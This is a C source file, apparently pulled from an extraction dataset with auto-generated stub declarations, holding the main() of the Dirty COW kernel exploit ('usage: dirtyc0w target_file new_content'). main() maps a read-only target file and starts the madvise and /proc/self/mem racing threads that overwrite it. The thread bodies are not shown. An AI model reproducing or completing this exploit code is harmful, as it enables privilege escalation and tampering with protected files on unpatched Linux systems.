
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


typedef int pthread_t ;
struct TYPE_3__ {int st_size; } ;


 int MAP_PRIVATE ;
 int O_RDONLY ;
 int PROT_READ ;
 int f ;
 int fprintf (int ,char*,char*) ;
 int fstat (int ,TYPE_1__*) ;
 int madviseThread ;
 scalar_t__ map ;
 scalar_t__ mmap (int *,int ,int ,int ,int ,int ) ;
 char* name ;
 int open (char*,int ) ;
 int printf (char*,uintptr_t) ;
 int procselfmemThread ;
 int pthread_create (int *,int *,int ,char*) ;
 int pthread_join (int ,int *) ;
 TYPE_1__ st ;
 int stderr ;

int main(int argc,char *argv[])
{



  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;



  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
  map=mmap(((void*)0),st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);



  pthread_create(&pth1,((void*)0),madviseThread,argv[1]);
  pthread_create(&pth2,((void*)0),procselfmemThread,argv[2]);



  pthread_join(pth1,((void*)0));
  pthread_join(pth2,((void*)0));
  return 0;
}
